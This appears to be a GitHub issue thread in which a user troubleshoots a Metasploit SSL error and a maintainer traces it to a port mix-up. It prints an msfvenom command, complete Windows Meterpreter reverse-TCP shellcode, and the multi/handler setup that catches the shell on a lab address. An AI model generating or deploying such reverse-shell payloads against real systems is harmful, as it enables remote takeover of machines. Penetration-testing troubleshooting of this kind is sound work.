Metasploit-framework: OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol

How are you generating the payload? msfvenom? Can you post the logs?

Thanks.

I used msfvenom, and below is the console log.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=4444 -f python
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of python file: 1602 bytes
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x6a\x05\x68\xc0\xa8\x38\x04\x68\x02\x00\x11"
buf += "\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
buf += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
buf += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
buf += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
buf += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
buf += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0"
buf += "\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
root@kali32:~#
root@kali32:~# msfconsole

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) >
msf exploit(handler) > set LHOST 192.168.56.4
LHOST => 192.168.56.4
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.56.4 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name

0 Wildcard Target

msf exploit(handler) > exploit

[] Started reverse TCP handler on 192.168.56.4:4444
[] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.56.119
[-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol

how did you invoke your payload with format 'python' on the target?

I noticed your expected behavior section is from 2015. Are you following some sort of tutorial or blog post about exploiting python programs?

yes, I follow this blog
http://inaz2.hatenablog.com/entry/2015/07/13/011841

thanks

I followed the blog steps and it worked as expected. I'm suspecting you pointed the Python shellcode injector at the metasploit listener, instead of the vulnerable service. That would create the error you see here. The blog is confusing because the author uses port 4444 for both the vulnerable service and the listener. Try changing the ports and you will see what I mean.

Good luck.